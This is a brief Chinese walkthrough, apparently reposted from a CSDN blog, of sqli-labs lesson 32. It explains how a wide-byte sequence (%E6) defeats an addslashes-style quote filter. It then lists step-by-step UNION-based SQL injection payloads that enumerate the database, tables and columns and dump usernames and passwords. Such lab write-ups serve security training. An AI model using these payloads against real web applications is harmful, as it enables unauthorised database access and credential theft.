Less(32)GET - Bypass custom filter adding slashes to dangerous chars
1.查看一下php文件:
check_addslashes()会在单引号前加一个\ 例如:I'm hacker 传入addslashes(),得到:I\'m hacker
本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过:
原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6' 这样的构造时,' 前面加的 \ 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 \ 的作用,库。
2.爆破
(1)爆库:?id=-1%E6' union select 1,2,database() --+
(2)爆表:?id=-1%E6' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+
需要对战ASCII码表,将security换成其对应的16进制
(3)爆列名:?id=-1%E6' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+
(4)爆值:?id=-1%E6' union select 1,group_concat(username,0x7e,password),3 from security.users --+
原文链接:https://blog.csdn.net/qq_41420747/article/details/81836327